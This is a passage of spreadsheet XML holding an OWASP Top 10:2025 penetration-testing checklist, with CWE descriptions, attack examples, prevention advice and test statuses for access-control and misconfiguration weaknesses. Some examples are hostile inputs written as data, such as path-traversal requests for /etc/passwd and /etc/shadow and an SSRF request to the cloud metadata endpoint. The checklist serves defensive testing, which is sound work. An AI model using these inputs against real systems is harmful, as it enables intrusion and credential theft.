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ASP Top 10 2025 Checklist" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="Legend &amp; Instructions" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="Category Summary" sheetId="3" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="0" name="_xlnm._FilterDatabase">'OWASP Top 10 2025 Checklist'!$A$3:$M$252</definedName>
  </definedNames>
  <calcPr/>
  <extLst>
    <ext uri="GoogleSheetsCustomDataVersion2">
      <go:sheetsCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId7" roundtripDataChecksum="6+aDMElBAiytWESjhmS95G2o+EiDf62kljA9iIkXVV8="/>
    </ext>
  </extLst>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2864" uniqueCount="1867">
  <si>
    <t>🔐  OWASP Top 10:2025 — Complete Penetration Testing Checklist  (249 CWEs)</t>
  </si>
  <si>
    <t>Source: owasp.org/Top10/2025  |  Data verified from OWASP official pages &amp; MITRE CWE  |  A01:40  A02:16  A03:6  A04:32  A05:37  A06:39  A07:36  A08:14  A09:5  A10:24  =  249 CWEs</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>OWASP ID</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>CWE ID</t>
  </si>
  <si>
    <t>CWE Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Example 1</t>
  </si>
  <si>
    <t>Example 2</t>
  </si>
  <si>
    <t>Example 3</t>
  </si>
  <si>
    <t>Prevention</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Severity</t>
  </si>
  <si>
    <t>Tester Notes</t>
  </si>
  <si>
    <t>A01</t>
  </si>
  <si>
    <t>Broken Access Control</t>
  </si>
  <si>
    <t>CWE-22</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t>Restricts file access to a safe directory but fails to neutralise ../ sequences, letting attackers escape the root.</t>
  </si>
  <si>
    <t>GET /download?file=../../etc/passwd returns the server's password file.</t>
  </si>
  <si>
    <t>Archive extraction (ZipSlip) writes files outside the target directory via crafted paths.</t>
  </si>
  <si>
    <t>Web app reads /var/app/files/+userInput; attacker passes ../../../../etc/shadow.</t>
  </si>
  <si>
    <t>Canonicalise all paths; verify they start with the allowed base; use chroot/containers; never concatenate user input into file paths.</t>
  </si>
  <si>
    <t>❌ Fail</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>CWE-23</t>
  </si>
  <si>
    <t>Relative Path Traversal</t>
  </si>
  <si>
    <t>Relative ../ sequences in user-supplied input resolve outside the intended directory.</t>
  </si>
  <si>
    <t>Image viewer: /view?img=../config/database.yml leaks DB credentials.</t>
  </si>
  <si>
    <t>Log viewer accepts filename param: ../../../../var/log/auth.log.</t>
  </si>
  <si>
    <t>Template engine renders user-controlled relative path exposing source code.</t>
  </si>
  <si>
    <t>Resolve canonical path first; verify it starts with the allowed base; reject inputs containing ../; use allowlists for filenames.</t>
  </si>
  <si>
    <t>CWE-36</t>
  </si>
  <si>
    <t>Absolute Path Traversal</t>
  </si>
  <si>
    <t>User input provides an absolute path (e.g., /etc/passwd) used directly, bypassing restriction logic.</t>
  </si>
  <si>
    <t>File API accepts full OS path in JSON body: {'path':'/etc/shadow'}.</t>
  </si>
  <si>
    <t>Windows share: user submits C:\Windows\System32\config\SAM.</t>
  </si>
  <si>
    <t>Cloud storage endpoint accepts absolute path, leaking internal files.</t>
  </si>
  <si>
    <t>Reject input starting with / or drive letters; strip leading slashes; validate against a whitelist of allowed base paths.</t>
  </si>
  <si>
    <t>⚠️ Needs Review</t>
  </si>
  <si>
    <t>CWE-59</t>
  </si>
  <si>
    <t>Link Following</t>
  </si>
  <si>
    <t>The software accesses a file without verifying whether a symbolic or hard link points outside the intended scope.</t>
  </si>
  <si>
    <t>Temp file in /tmp replaced with symlink to /etc/cron.d/ before app writes to it.</t>
  </si>
  <si>
    <t>Web server follows symlink from web root to /etc/nginx/nginx.conf.</t>
  </si>
  <si>
    <t>Archive extraction follows symlinks overwriting /etc/passwd.</t>
  </si>
  <si>
    <t>Use O_NOFOLLOW flag; validate link targets before opening; run file ops in containers; use secure temp-file APIs.</t>
  </si>
  <si>
    <t xml:space="preserve">✅ Pass </t>
  </si>
  <si>
    <t>CWE-61</t>
  </si>
  <si>
    <t>UNIX Symlink Following</t>
  </si>
  <si>
    <t>Application follows symlinks without verifying the target is within the permitted directory.</t>
  </si>
  <si>
    <t>Privileged daemon writes to /var/log/app.log; attacker creates symlink to /etc/hosts.</t>
  </si>
  <si>
    <t>Package installer follows symlink in archive, overwriting system binary.</t>
  </si>
  <si>
    <t>Backup tool follows symlinks, exfiltrating private SSH keys.</t>
  </si>
  <si>
    <t>Open files with O_NOFOLLOW; use realpath() to resolve before access; apply strict umask; use namespaces/containers.</t>
  </si>
  <si>
    <t>CWE-65</t>
  </si>
  <si>
    <t>Windows Hard Link</t>
  </si>
  <si>
    <t>The app doesn't account for hard links, letting attackers point one from an accessible file to a protected one.</t>
  </si>
  <si>
    <t>Attacker creates hard link from writable C:\Users\Public\file.txt to C:\Windows\System32\drivers\etc\hosts.</t>
  </si>
  <si>
    <t>SetupAPI writes config to user-owned path; hard link redirects write to system file.</t>
  </si>
  <si>
    <t>Antivirus quarantine move operation redirected via hard link to overwrite a DLL.</t>
  </si>
  <si>
    <t>Use FILE_FLAG_OPEN_REPARSE_POINT; validate file IDs and volume serial numbers; restrict low-privilege write access to system directories.</t>
  </si>
  <si>
    <t>CWE-200</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information</t>
  </si>
  <si>
    <t>The product exposes sensitive data (credentials, PII, internal configs) to actors not authorised to access it.</t>
  </si>
  <si>
    <t>API /api/users returns full user objects including password hashes to unauthenticated callers.</t>
  </si>
  <si>
    <t>Error page displays full stack trace with DB connection string.</t>
  </si>
  <si>
    <t>Admin endpoint /debug/env returns all environment variables including API keys.</t>
  </si>
  <si>
    <t>Apply least-privilege data exposure; use DTOs to return only needed fields; suppress detailed errors in production; audit all API responses.</t>
  </si>
  <si>
    <t>☐ Not Tested</t>
  </si>
  <si>
    <t>CWE-201</t>
  </si>
  <si>
    <t>Exposure Through Sent Data</t>
  </si>
  <si>
    <t>Transmitted data includes sensitive information not needed by the receiving party.</t>
  </si>
  <si>
    <t>Login response body includes internal user ID and role flags unnecessary for the client.</t>
  </si>
  <si>
    <t>Password reset email contains current hashed password in plain text.</t>
  </si>
  <si>
    <t>WebSocket event broadcasts private order details to all connected clients.</t>
  </si>
  <si>
    <t>Review all outbound payloads; strip server-side-only fields before serialisation; use field-level access control; monitor outbound data flows.</t>
  </si>
  <si>
    <t>CWE-219</t>
  </si>
  <si>
    <t>Sensitive Data Under Web Root</t>
  </si>
  <si>
    <t>Sensitive files (backups, configs, .env) stored inside the web-accessible document root without access controls.</t>
  </si>
  <si>
    <t>.env file with DB creds accessible at https://site.com/.env.</t>
  </si>
  <si>
    <t>Database dump backup.sql reachable under /public/backup.sql.</t>
  </si>
  <si>
    <t>.git directory exposed, allowing source code reconstruction via /.git/config.</t>
  </si>
  <si>
    <t>Store sensitive files outside web root; add server-level deny rules; run automated scans for common sensitive file paths; disable directory listing.</t>
  </si>
  <si>
    <t>CWE-276</t>
  </si>
  <si>
    <t>Incorrect Default Permissions</t>
  </si>
  <si>
    <t>During installation, files or directories are assigned overly permissive defaults.</t>
  </si>
  <si>
    <t>App installer creates config.xml with chmod 777, readable by all local users.</t>
  </si>
  <si>
    <t>Docker image copies private key with default 644 permissions.</t>
  </si>
  <si>
    <t>Web framework stores session files in /tmp with world-read permissions.</t>
  </si>
  <si>
    <t>Explicitly set restrictive permissions (600/640 for configs, 700 for dirs); validate with automated permission audits in CI/CD.</t>
  </si>
  <si>
    <t>CWE-281</t>
  </si>
  <si>
    <t>Improper Preservation of Permissions</t>
  </si>
  <si>
    <t>When copying or restoring objects, the software fails to preserve correct permissions.</t>
  </si>
  <si>
    <t>File restore operation resets permissions to defaults, making private docs world-readable.</t>
  </si>
  <si>
    <t>ZIP extraction doesn't preserve Unix permissions; extracted scripts become executable by all.</t>
  </si>
  <si>
    <t>Git repo checkout overwrites file permissions set by deployment scripts.</t>
  </si>
  <si>
    <t>Preserve original ACLs/permissions during copy/restore; explicitly re-apply security-relevant permissions post-operation; test with automated checks.</t>
  </si>
  <si>
    <t>CWE-282</t>
  </si>
  <si>
    <t>Improper Ownership Management</t>
  </si>
  <si>
    <t>Software assigns incorrect ownership or fails to verify ownership before granting access.</t>
  </si>
  <si>
    <t>File upload renames file but leaves ownership as www-data, allowing web server to read other users' files.</t>
  </si>
  <si>
    <t>chown not applied after sudo operation, leaving root-owned config readable by app user.</t>
  </si>
  <si>
    <t>Container shares volume without setting uid/gid, allowing any container to access another's data.</t>
  </si>
  <si>
    <t>Explicitly set ownership on all created resources; validate ownership before privileged operations; use user namespaces in containers.</t>
  </si>
  <si>
    <t>CWE-283</t>
  </si>
  <si>
    <t>Unverified Ownership</t>
  </si>
  <si>
    <t>The system does not verify that a requesting actor actually owns the resource before granting access.</t>
  </si>
  <si>
    <t>DELETE /api/posts/{id} deletes any post by ID without checking ownership.</t>
  </si>
  <si>
    <t>Invoice PDF download endpoint serves any invoice ID without ownership check.</t>
  </si>
  <si>
    <t>File share revoke API accepts any fileId without checking if invoker is the owner.</t>
  </si>
  <si>
    <t>Always verify resource ownership server-side; implement object-level authorisation checks; use indirect reference maps tied to the session.</t>
  </si>
  <si>
    <t>CWE-284</t>
  </si>
  <si>
    <t>Improper Access Control</t>
  </si>
  <si>
    <t>The software does not restrict or incorrectly restricts access to a resource.</t>
  </si>
  <si>
    <t>Admin panel /admin/ accessible to regular authenticated users with no role check.</t>
  </si>
  <si>
    <t>PUT /api/settings updates global app config without verifying admin privilege.</t>
  </si>
  <si>
    <t>S3 bucket ACL left as public-read, exposing all customer uploads.</t>
  </si>
  <si>
    <t>Implement deny-by-default; use centralised RBAC; regularly audit resource permissions; use IaC security policies.</t>
  </si>
  <si>
    <t>CWE-285</t>
  </si>
  <si>
    <t>Improper Authorization</t>
  </si>
  <si>
    <t>The authorization check exists but is applied incorrectly.</t>
  </si>
  <si>
    <t>Role check compares role ID to 'admin' but attacker passes 'Admin' (case mismatch).</t>
  </si>
  <si>
    <t>JWT middleware validates token signature but doesn't check the 'role' claim against required privilege.</t>
  </si>
  <si>
    <t>API gateway checks auth header is present but not the token's scope claims.</t>
  </si>
  <si>
    <t>Use well-tested authorisation libraries; check claims/roles explicitly; test negative cases; centralise authorisation logic.</t>
  </si>
  <si>
    <t>CWE-352</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>Web app executes state-changing requests submitted by a victim whose browser is tricked by an attacker-controlled page.</t>
  </si>
  <si>
    <t>Malicious page submits hidden form POST /transfer?to=attacker&amp;amount=5000 using victim's session cookie.</t>
  </si>
  <si>
    <t>Img tag with src='/api/logout' logs out victim silently.</t>
  </si>
  <si>
    <t>PUT /api/email/change triggered from attacker site changes victim's account email.</t>
  </si>
  <si>
    <t>Use SameSite=Strict cookies; implement CSRF tokens; verify Origin/Referer headers; use custom request headers for AJAX APIs.</t>
  </si>
  <si>
    <t>CWE-359</t>
  </si>
  <si>
    <t>Exposure of Private Personal Information</t>
  </si>
  <si>
    <t>The product does not adequately protect PII from being accessed by unauthorised parties.</t>
  </si>
  <si>
    <t>User search API returns full profile including SSN and DOB for any authenticated user.</t>
  </si>
  <si>
    <t>Public leaderboard API exposes email addresses not intended to be public.</t>
  </si>
  <si>
    <t>Activity log endpoint exposes other users' browsing history.</t>
  </si>
  <si>
    <t>Implement field-level access control; anonymise PII in non-production; apply data minimisation; conduct regular DPIA reviews.</t>
  </si>
  <si>
    <t>CWE-377</t>
  </si>
  <si>
    <t>Insecure Temporary File</t>
  </si>
  <si>
    <t>Insecure creation or use of temporary files makes them accessible to local attackers.</t>
  </si>
  <si>
    <t>mktemp() creates predictable filename /tmp/app1234; attacker pre-creates symlink.</t>
  </si>
  <si>
    <t>Temp file containing decrypted private key written to world-readable /tmp.</t>
  </si>
  <si>
    <t>Upload staging uses fixed /tmp/upload.dat, allowing local users to read concurrent uploads.</t>
  </si>
  <si>
    <t>Use mkstemp() or equivalent; set permissions 600; use private temp directories; delete immediately after use; prefer in-memory processing.</t>
  </si>
  <si>
    <t>CWE-379</t>
  </si>
  <si>
    <t>Insecure Temp File Directory</t>
  </si>
  <si>
    <t>Temporary files are created in a shared directory with insecure permissions.</t>
  </si>
  <si>
    <t>App writes session tokens to /tmp/ with world-read permissions.</t>
  </si>
  <si>
    <t>Compilation step dumps intermediate files with sensitive data to /var/tmp.</t>
  </si>
  <si>
    <t>Cron job creates temp export file in shared /tmp before emailing, exposed to other local users.</t>
  </si>
  <si>
    <t>Create temp files in application-private directories; set umask 077; prefer memory-based storage for sensitive data.</t>
  </si>
  <si>
    <t>CWE-402</t>
  </si>
  <si>
    <t>Resource Leak</t>
  </si>
  <si>
    <t>The software makes resources available beyond their intended audience.</t>
  </si>
  <si>
    <t>Memory buffer containing private key reused and transmitted in debug response.</t>
  </si>
  <si>
    <t>File descriptor leak passes open DB connection to forked child process with lower privileges.</t>
  </si>
  <si>
    <t>API response accidentally includes internal server objects serialised into JSON.</t>
  </si>
  <si>
    <t>Explicitly close/release resources after use; review serialisation logic; sanitise debug/error output; use memory scrubbing for sensitive data.</t>
  </si>
  <si>
    <t>CWE-424</t>
  </si>
  <si>
    <t>Improper Protection of Alternate Path</t>
  </si>
  <si>
    <t>The primary path is protected but alternate paths (hidden URLs, legacy endpoints) are left unprotected.</t>
  </si>
  <si>
    <t>New API /v2/admin secured, but old /v1/admin still active and unauthenticated.</t>
  </si>
  <si>
    <t>Mobile endpoint /m/settings bypasses web-tier WAF and auth middleware.</t>
  </si>
  <si>
    <t>Direct servlet URL /servlet/AdminServlet bypasses Spring Security filter chain.</t>
  </si>
  <si>
    <t>Audit all routes; remove or protect legacy endpoints; use security testing tools to discover hidden paths; apply consistent middleware to all routes.</t>
  </si>
  <si>
    <t>CWE-425</t>
  </si>
  <si>
    <t>Direct Request (Forced Browsing)</t>
  </si>
  <si>
    <t>The web app doesn't enforce access control, allowing unauthenticated users to access protected pages by knowing their URL.</t>
  </si>
  <si>
    <t>Navigating directly to /admin/users.php works without authentication.</t>
  </si>
  <si>
    <t>Authenticated page /reports/annual.pdf accessible via direct URL without session.</t>
  </si>
  <si>
    <t>POST endpoint /api/admin/resetAll callable without any auth token.</t>
  </si>
  <si>
    <t>Enforce server-side authorisation on every request; never rely on UI to hide links; implement framework-level security filters; use automated crawlers to test.</t>
  </si>
  <si>
    <t>CWE-441</t>
  </si>
  <si>
    <t>Confused Deputy</t>
  </si>
  <si>
    <t>Software receives a request it didn't initiate and acts on behalf of an unauthorized party using its own authority.</t>
  </si>
  <si>
    <t>SSRF: server fetches http://169.254.169.254/latest/meta-data/ on behalf of attacker.</t>
  </si>
  <si>
    <t>PDF generator fetches attacker-specified URL, proxying requests to internal services.</t>
  </si>
  <si>
    <t>Email sender blindly forwards user-supplied SMTP relay URL, acting as open relay.</t>
  </si>
  <si>
    <t>Validate and whitelist all server-fetched URLs; use SSRF-safe HTTP clients; segment internal networks; deny server-initiated requests to private IP ranges.</t>
  </si>
  <si>
    <t>CWE-497</t>
  </si>
  <si>
    <t>Exposure of Sensitive System Information</t>
  </si>
  <si>
    <t>The product reveals internal system details (OS version, DB version, internal IPs) that assist attackers.</t>
  </si>
  <si>
    <t>HTTP response header Server: Apache/2.4.49 reveals exploitable version.</t>
  </si>
  <si>
    <t>Error message: Connection to 10.0.0.5:3306 (MySQL 5.7) failed exposes internal topology.</t>
  </si>
  <si>
    <t>/api/version endpoint returns full dependency tree with library versions.</t>
  </si>
  <si>
    <t>Suppress version headers; use generic error messages; audit all endpoints returning system info; remove debug and version endpoints before deployment.</t>
  </si>
  <si>
    <t>CWE-538</t>
  </si>
  <si>
    <t>Sensitive Info in Accessible File/Dir</t>
  </si>
  <si>
    <t>The product places sensitive data into a file or directory accessible by unauthorised parties.</t>
  </si>
  <si>
    <t>Deployment script writes API keys to /var/www/html/deploy.log (web-accessible).</t>
  </si>
  <si>
    <t>Application logs DB passwords to /var/log/app.log readable by any system user.</t>
  </si>
  <si>
    <t>Source control commit includes credentials in appsettings.json tracked by git.</t>
  </si>
  <si>
    <t>Store secrets in environment variables or secret managers; exclude sensitive files from web roots and VCS; use .gitignore and pre-commit hooks; rotate exposed secrets immediately.</t>
  </si>
  <si>
    <t>CWE-540</t>
  </si>
  <si>
    <t>Sensitive Info in Source Code</t>
  </si>
  <si>
    <t>Hardcoded credentials, API keys, or private data are embedded in source code.</t>
  </si>
  <si>
    <t>AWS_SECRET_KEY = 'AKIAIOSFODNN7EXAMPLE' hardcoded in Python script committed to GitHub.</t>
  </si>
  <si>
    <t>Database password in JDBC URL string in Java source pushed to public repo.</t>
  </si>
  <si>
    <t>Private RSA key pasted directly into source code.</t>
  </si>
  <si>
    <t>Use secret managers (Vault, AWS Secrets Manager); implement pre-commit secret scanning; rotate any secrets found in code history immediately.</t>
  </si>
  <si>
    <t>CWE-548</t>
  </si>
  <si>
    <t>Directory Listing Enabled</t>
  </si>
  <si>
    <t>Directory listings are enabled, revealing file names and paths to anyone requesting a directory URL.</t>
  </si>
  <si>
    <t>https://site.com/uploads/ shows all customer-uploaded files.</t>
  </si>
  <si>
    <t>https://site.com/backup/ reveals database dump files.</t>
  </si>
  <si>
    <t>Apache with Options +Indexes exposes /var/www/html contents.</t>
  </si>
  <si>
    <t>Disable directory listing (Options -Indexes); add index files; use deny rules; place sensitive files outside web root.</t>
  </si>
  <si>
    <t>CWE-552</t>
  </si>
  <si>
    <t>Files Accessible to External Parties</t>
  </si>
  <si>
    <t>Files or directories intended only for internal use are accessible externally via the web or network.</t>
  </si>
  <si>
    <t>phpMyAdmin installed at /phpmyadmin/ accessible to the public internet.</t>
  </si>
  <si>
    <t>.DS_Store files leaked via web, revealing internal directory structure.</t>
  </si>
  <si>
    <t>Git repository at /.git/ accessible, allowing full source code download.</t>
  </si>
  <si>
    <t>Remove development tools from production; block access to dotfiles via server rules; audit internet-facing endpoints; use WAF rules for common sensitive paths.</t>
  </si>
  <si>
    <t>CWE-566</t>
  </si>
  <si>
    <t>IDOR via SQL Primary Key</t>
  </si>
  <si>
    <t>The application uses a user-supplied value as a SQL primary key without verifying that the user is authorised to access that record.</t>
  </si>
  <si>
    <t>GET /api/invoice?id=1001 returns invoice belonging to another user when attacker changes the id.</t>
  </si>
  <si>
    <t>POST /messages/view with body {'messageId':'5'} shows another user's private message.</t>
  </si>
  <si>
    <t>Admin tool uses orderId from cookie to build SQL query without ownership check.</t>
  </si>
  <si>
    <t>Always verify object ownership server-side before returning data; use indirect reference maps; implement OWASP IDOR controls.</t>
  </si>
  <si>
    <t>CWE-601</t>
  </si>
  <si>
    <t>Open Redirect</t>
  </si>
  <si>
    <t>A web app accepts user-controlled input that specifies a redirect URL without validation, enabling phishing attacks.</t>
  </si>
  <si>
    <t>https://trusted.com/login?next=https://evil.com redirects after login to attacker site.</t>
  </si>
  <si>
    <t>Password reset link uses redirect param: /reset?token=X&amp;redirect=https://phishing.com.</t>
  </si>
  <si>
    <t>OAuth flow abuses open redirect to steal authorisation code.</t>
  </si>
  <si>
    <t>Whitelist allowed redirect URLs; use relative paths only; validate against a strict allowlist; avoid passing redirect URLs as query parameters.</t>
  </si>
  <si>
    <t>CWE-615</t>
  </si>
  <si>
    <t>Sensitive Info in Comments</t>
  </si>
  <si>
    <t>Developer comments in HTML or JS contain passwords, API keys, or internal paths.</t>
  </si>
  <si>
    <t>&lt;!-- TODO: remove admin bypass: if user=='devtest' grant_admin() --&gt; visible in HTML source.</t>
  </si>
  <si>
    <t>// DB password: hunter2 left in client-side JavaScript.</t>
  </si>
  <si>
    <t>/* Internal IP: 192.168.1.50 MySQL */ in publicly served JS bundle.</t>
  </si>
  <si>
    <t>Use static analysis to detect secrets in comments; enforce code review checklists; minify and strip comments from production builds; use pre-commit hooks.</t>
  </si>
  <si>
    <t>CWE-639</t>
  </si>
  <si>
    <t>Authorization Bypass via User-Controlled Key</t>
  </si>
  <si>
    <t>The system uses a key value that can be manipulated by the user to access resources belonging to others.</t>
  </si>
  <si>
    <t>IDOR: changing account_id=123 to account_id=124 returns other user's data.</t>
  </si>
  <si>
    <t>JWT payload contains role:user; attacker modifies to role:admin (with weak/no signature check).</t>
  </si>
  <si>
    <t>Cookie value userId=42 directly used in SQL query without session validation.</t>
  </si>
  <si>
    <t>Never trust client-supplied keys for authorisation; derive identity from server-side session; use cryptographically signed tokens with server-side validation.</t>
  </si>
  <si>
    <t>CWE-668</t>
  </si>
  <si>
    <t>Exposure of Resource to Wrong Sphere</t>
  </si>
  <si>
    <t>The product exposes a resource to a control sphere it wasn't intended to reach.</t>
  </si>
  <si>
    <t>Internal microservice API exposed to public internet through misconfigured load balancer.</t>
  </si>
  <si>
    <t>Shared memory segment containing session tokens accessible to all processes on the host.</t>
  </si>
  <si>
    <t>Cloud storage bucket mis-scoped as public instead of private.</t>
  </si>
  <si>
    <t>Apply least-privilege network segmentation; audit cloud resource IAM policies; use VPC/private subnets for internal services; conduct regular exposure assessments.</t>
  </si>
  <si>
    <t>CWE-732</t>
  </si>
  <si>
    <t>Incorrect Permission for Critical Resource</t>
  </si>
  <si>
    <t>Critical resources (keys, configs, executables) have permissions set too broadly.</t>
  </si>
  <si>
    <t>SSL private key /etc/ssl/private/server.key has permissions 644 (world-readable).</t>
  </si>
  <si>
    <t>Crontab writeable by all users (chmod 777), allowing privilege escalation.</t>
  </si>
  <si>
    <t>Database config with credentials has world-read permissions (644).</t>
  </si>
  <si>
    <t>Audit and enforce strict permissions (400/600 for keys, 640/750 for configs); automate permission checks in CI/CD; use file integrity monitoring tools.</t>
  </si>
  <si>
    <t>CWE-749</t>
  </si>
  <si>
    <t>Exposed Dangerous Method</t>
  </si>
  <si>
    <t>The software exposes dangerous internal methods via an API.</t>
  </si>
  <si>
    <t>Spring Boot Actuator /actuator/shutdown endpoint exposed to public, allowing server shutdown.</t>
  </si>
  <si>
    <t>Debug API /api/exec accepts arbitrary shell commands intended only for developers.</t>
  </si>
  <si>
    <t>Serialisation endpoint exposes Java reflection methods exploitable for RCE.</t>
  </si>
  <si>
    <t>Disable or restrict access to dangerous endpoints in production; require admin authentication for management APIs; use network-level controls.</t>
  </si>
  <si>
    <t>CWE-862</t>
  </si>
  <si>
    <t>Missing Authorization</t>
  </si>
  <si>
    <t>The software performs a sensitive operation without checking whether the actor is authorised.</t>
  </si>
  <si>
    <t>DELETE /api/users/{id} deletes any user account with no auth token required.</t>
  </si>
  <si>
    <t>POST /api/admin/config changes system settings with only a valid session, no role check.</t>
  </si>
  <si>
    <t>File upload endpoint stores files server-side with no authentication at all.</t>
  </si>
  <si>
    <t>Implement authorisation checks on every state-changing operation; use framework-level annotations; test with unauthenticated and low-privilege users.</t>
  </si>
  <si>
    <t>CWE-863</t>
  </si>
  <si>
    <t>Incorrect Authorization</t>
  </si>
  <si>
    <t>An authorisation check exists but is incorrect, allowing privilege escalation.</t>
  </si>
  <si>
    <t>User can access admin panel because role check uses OR instead of AND: if role=='user' OR role=='admin'.</t>
  </si>
  <si>
    <t>Permission check validates token presence but not the token's scope for the specific resource.</t>
  </si>
  <si>
    <t>Multi-tenant app checks user is authenticated but not that they belong to the correct tenant.</t>
  </si>
  <si>
    <t>Test authorisation with matrix of roles x actions; use automated RBAC testing; review logic operators; employ centralised policy engines.</t>
  </si>
  <si>
    <t>CWE-918</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>The web server fetches a URL specified by user input, allowing attackers to probe internal services.</t>
  </si>
  <si>
    <t>POST /fetch with url=http://169.254.169.254/latest/meta-data/ retrieves AWS IAM credentials.</t>
  </si>
  <si>
    <t>PDF converter fetches user-provided URL, accessing internal http://10.0.0.1/admin.</t>
  </si>
  <si>
    <t>Image proxy at /proxy?url= used to port-scan the internal network.</t>
  </si>
  <si>
    <t>Validate and allowlist permitted URL schemes and hostnames; use DNS rebinding protection; deploy in isolated network; block private IP ranges at HTTP client level.</t>
  </si>
  <si>
    <t>CWE-922</t>
  </si>
  <si>
    <t>Insecure Storage of Sensitive Information</t>
  </si>
  <si>
    <t>The software stores sensitive data without adequate protection.</t>
  </si>
  <si>
    <t>Mobile app stores auth tokens in Android SharedPreferences (world-readable on rooted device).</t>
  </si>
  <si>
    <t>Passwords stored in plain text in SQLite database on device.</t>
  </si>
  <si>
    <t>Session tokens written to browser localStorage, accessible to any same-origin JS.</t>
  </si>
  <si>
    <t>Use platform keychain/keystore APIs; encrypt sensitive data at rest; use httpOnly cookies for tokens; apply app-level encryption for mobile data stores.</t>
  </si>
  <si>
    <t>CWE-1275</t>
  </si>
  <si>
    <t>Sensitive Cookie with Improper SameSite</t>
  </si>
  <si>
    <t>A session or sensitive cookie lacks the SameSite attribute, enabling CSRF attacks.</t>
  </si>
  <si>
    <t>Session cookie Set-Cookie: session=abc123 with no SameSite attribute sent over HTTPS.</t>
  </si>
  <si>
    <t>SameSite=None; Secure used without CSRF token, still allowing cross-origin state changes.</t>
  </si>
  <si>
    <t>Auth cookie with SameSite=Lax allows CSRF via top-level navigation POST.</t>
  </si>
  <si>
    <t>Set SameSite=Strict for session cookies; combine with CSRF tokens; set Secure and HttpOnly flags; audit all Set-Cookie headers.</t>
  </si>
  <si>
    <t>A02</t>
  </si>
  <si>
    <t>Security Misconfiguration</t>
  </si>
  <si>
    <t>CWE-5</t>
  </si>
  <si>
    <t>J2EE: No Encryption for Transmission</t>
  </si>
  <si>
    <t>J2EE application transmits sensitive data without TLS/SSL.</t>
  </si>
  <si>
    <t>Login form POSTs credentials over http:// instead of https://.</t>
  </si>
  <si>
    <t>J2EE EJB remote interface communicates over unencrypted RMI.</t>
  </si>
  <si>
    <t>web.xml lacks transport-guarantee CONFIDENTIAL for sensitive servlets.</t>
  </si>
  <si>
    <t>Enforce HTTPS site-wide; configure HSTS; set transport-guarantee CONFIDENTIAL in web.xml; redirect all HTTP to HTTPS; test with network sniffers.</t>
  </si>
  <si>
    <t>CWE-11</t>
  </si>
  <si>
    <t>ASP.NET: Debug Binary</t>
  </si>
  <si>
    <t>ASP.NET application deployed with debug=true in web.config.</t>
  </si>
  <si>
    <t>web.config: &lt;compilation debug='true'/&gt; in production leaks full stack traces.</t>
  </si>
  <si>
    <t>Debug build DLL deployed, exposing internal symbol names and types.</t>
  </si>
  <si>
    <t>ELMAH error log accessible at /elmah.axd on production server.</t>
  </si>
  <si>
    <t>Set debug=false in web.config; use separate Release build configs; remove debug handlers from production; validate with automated config review in deployment pipeline.</t>
  </si>
  <si>
    <t>CWE-13</t>
  </si>
  <si>
    <t>ASP.NET: Password in Config File</t>
  </si>
  <si>
    <t>ASP.NET web.config contains plaintext passwords for databases or external services.</t>
  </si>
  <si>
    <t>&lt;connectionStrings&gt;&lt;add connectionString='Server=db;Password=secret123'/&gt;&lt;/connectionStrings&gt; in plain text.</t>
  </si>
  <si>
    <t>SMTP credentials in appSettings: &lt;add key='SmtpPassword' value='pass'/&gt;.</t>
  </si>
  <si>
    <t>Web.config checked into source control with production DB credentials.</t>
  </si>
  <si>
    <t>Use ASP.NET Protected Configuration to encrypt config sections; use environment variables or Azure Key Vault; never commit config files with secrets.</t>
  </si>
  <si>
    <t>CWE-15</t>
  </si>
  <si>
    <t>External Control of Configuration</t>
  </si>
  <si>
    <t>Externally-provided input can influence or directly set system configuration parameters.</t>
  </si>
  <si>
    <t>User-supplied catalog name written directly into DB connection string without validation.</t>
  </si>
  <si>
    <t>Environment variable from request header used to select logging backend.</t>
  </si>
  <si>
    <t>Config file path supplied via GET parameter: ?config=../../etc/app.conf.</t>
  </si>
  <si>
    <t>Validate and whitelist all configuration-influencing inputs; never allow external input to directly set system properties; use server-side config management exclusively.</t>
  </si>
  <si>
    <t>CWE-16</t>
  </si>
  <si>
    <t>Configuration</t>
  </si>
  <si>
    <t>Security weaknesses arising from improper configuration of application components.</t>
  </si>
  <si>
    <t>Default admin credentials (admin/admin) not changed after installation.</t>
  </si>
  <si>
    <t>Unnecessary HTTP methods (TRACE, PUT) enabled on production web server.</t>
  </si>
  <si>
    <t>TLS 1.0/1.1 still enabled alongside TLS 1.3 due to legacy configuration.</t>
  </si>
  <si>
    <t>Follow CIS benchmarks and vendor hardening guides; use IaC security scanning (Checkov, tfsec); perform regular configuration audits; enforce configuration drift detection.</t>
  </si>
  <si>
    <t>CWE-260</t>
  </si>
  <si>
    <t>Password in Configuration File</t>
  </si>
  <si>
    <t>Passwords stored in configuration files accessible to unauthorized actors.</t>
  </si>
  <si>
    <t>database.properties: db.password=SuperSecret stored in /etc/app/ with 644 permissions.</t>
  </si>
  <si>
    <t>Kubernetes ConfigMap contains database password in plaintext.</t>
  </si>
  <si>
    <t>Docker Compose file with hardcoded MYSQL_ROOT_PASSWORD=password committed to repo.</t>
  </si>
  <si>
    <t>Use secrets management solutions (Vault, AWS Secrets Manager, K8s Secrets with encryption); restrict config file permissions; rotate exposed credentials immediately.</t>
  </si>
  <si>
    <t>CWE-315</t>
  </si>
  <si>
    <t>Cleartext Storage in Cookie</t>
  </si>
  <si>
    <t>The application stores sensitive data in cookies without encryption.</t>
  </si>
  <si>
    <t>Cookie user_info=john:admin:true stores role in cleartext, allowing manipulation.</t>
  </si>
  <si>
    <t>Shopping cart cookie contains credit card last-four digits in plaintext.</t>
